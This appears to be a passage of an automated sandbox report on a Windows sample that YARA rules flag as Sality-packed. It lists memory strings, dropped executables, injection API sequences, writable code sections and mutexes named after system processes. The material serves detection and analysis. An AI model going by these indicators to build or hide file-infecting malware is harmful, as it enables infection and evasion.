        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
        Source: SearchApp.exe, 0000001F.00000000.1608113405.000001D62E2D1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1592907269.000001D62DC47000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1616012570.000001D6305B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
        Source: SearchApp.exe, 0000001F.00000000.1608113405.000001D62E2D1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1616012570.000001D6305B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
        Source: SearchApp.exe, 0000001F.00000000.1592907269.000001D62DC47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqsD
        Source: SearchApp.exe, 0000001F.00000000.1538337910.000001CE189D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/dhp(
        Source: SearchApp.exe, 0000001F.00000000.1538337910.000001CE189D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/mmx
        Source: SearchApp.exe, 0000001F.00000000.1538337910.000001CE189D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ntp
        Source: SearchApp.exe, 0000001F.00000000.1608113405.000001D62E2D1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1592907269.000001D62DC47000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1616012570.000001D6305B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
        Source: SearchApp.exe, 0000001F.00000000.1608113405.000001D62E2D1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1592907269.000001D62DC47000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1616012570.000001D6305B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1555660231.000001D61A642000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1550771232.000001D619B3D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1550771232.000001D619B3D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004336B0 GetKeyState,GetKeyState,GetKeyState,GetKeyState,6_2_004336B0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_00431920 IsWindowEnabled,TranslateAccelerator,IsChild,GetFocus,PostMessageA,PostMessageA,SendMessageA,IsChild,IsWindow,IsWindowVisible,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetParent,SendMessageA,WinHelpA,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,IsWindow,6_2_00431920

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8dcfe8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.24a2300.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8c79b4.1.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.24a25f4.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.872d5c.0.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8dcfe8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.2420000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: C:\lwkdr.exe, type: DROPPEDMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: C:\Users\user\AppData\Local\Temp\winxmkqo.exe, type: DROPPEDMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        PE file contains section with special chars
        Source: MyProg.exe.9.drStatic PE information: section name: Y|uR
        PE file has a writeable .text section
        Source: lwkdr.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: YMZwp.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: winxmkqo.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004BE74F NtdllDefWindowProc_A,CallWindowProcA,6_2_004BE74F
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004C0306 NtdllDefWindowProc_A,6_2_004C0306
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004343B0 GetClassInfoA,NtdllDefWindowProc_A,6_2_004343B0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0042E630 GetClassInfoA,LoadCursorA,GetStockObject,NtdllDefWindowProc_A,6_2_0042E630
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004BEAF7 GetWindowRect,wsprintfA,wsprintfA,GetClassInfoA,NtdllDefWindowProc_A,6_2_004BEAF7
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004782006_2_00478200
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004292C06_2_004292C0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004122D06_2_004122D0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004425206_2_00442520
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004916706_2_00491670
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0042B6306_2_0042B630
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004B37866_2_004B3786
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004B783A6_2_004B783A
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0043CA906_2_0043CA90
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0042CB206_2_0042CB20
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_00435B206_2_00435B20
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_00433D706_2_00433D70
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_00454DB86_2_00454DB8
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0045DE806_2_0045DE80
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_024296526_2_02429652
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_024322A06_2_024322A0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_02426A856_2_02426A85
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B36D009_2_00B36D00
        Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe F2DE2A37E6DFC90FFD0162EF11A7C9792850E37767B1E2C5AD28C751D18D750F
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\YMZwp.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: String function: 004ADD18 appears 57 times
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 1624
        Source: MyProg.exe.9.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
        Source: msedge.exe.6.drStatic PE information: Number of sections : 14 > 10
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8dcfe8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.24a2300.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8c79b4.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.24a25f4.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.872d5c.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8dcfe8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.2420000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: C:\lwkdr.exe, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: C:\Users\user\AppData\Local\Temp\winxmkqo.exe, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: YMZwp.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: lwkdr.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: YMZwp.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: winxmkqo.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: lwkdr.exe.6.drStatic PE information: Section .text
        Source: winxmkqo.exe.6.drStatic PE information: Section .text
        Source: YMZwp.exe.6.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
        Source: msedge.exe.6.drBinary string: @g_interceptionsntdll.dllg_originals\Device\\/?/?\\??\ntdll.dllRtlInitUnicodeStringntdll.dll\KnownDllsDeriveRestrictedAppContainerSidFromAppContainerSidAndRestrictedNameuserenvchromeInstallFileslpacChromeInstallFilesmediaFoundationCdmFileslpacMediaFoundationCdmDatalpacEdgeWdagCommslpacChromeNetworkSandboxKeyg_handles_to_close
        Source: msedge.exe.6.drBinary string: \\.\\Device\DeviceApi\Device\DeviceApi\CMApintdll.dllHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_PERFORMANCE_DATAHKEY_PERFORMANCE_TEXTHKEY_PERFORMANCE_NLSTEXTHKEY_CURRENT_CONFIGHKEY_DYN_DATA\Device\\Device\HarddiskVolume
        Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@8/133@107/5
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0242CC92 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,FindCloseChangeNotification,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification,CloseHandle,GetProcessHeap,HeapFree,6_2_0242CC92
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B3119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,9_2_00B3119F
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0242D2B0 CreateToolhelp32Snapshot,Process32First,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,Process32Next,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,FindCloseChangeNotification,CloseHandle,6_2_0242D2B0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004BD591 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,6_2_004BD591
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\k1[1].rarJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6600_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3736_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2584_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_412_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_5904_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6220_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_7944_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_7796_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3836_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1916_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1928_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\shellexperiencehost.exeM_7716_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5264_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_6820_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5708_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2256_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2156_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\sihclient.exeM_2784_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3932_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1948_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2680_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3628_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_776_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5396_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5384_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_6332_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1972_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\textinputhost.exeM_6720_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\smss.exeM_328_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3920_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_6092_
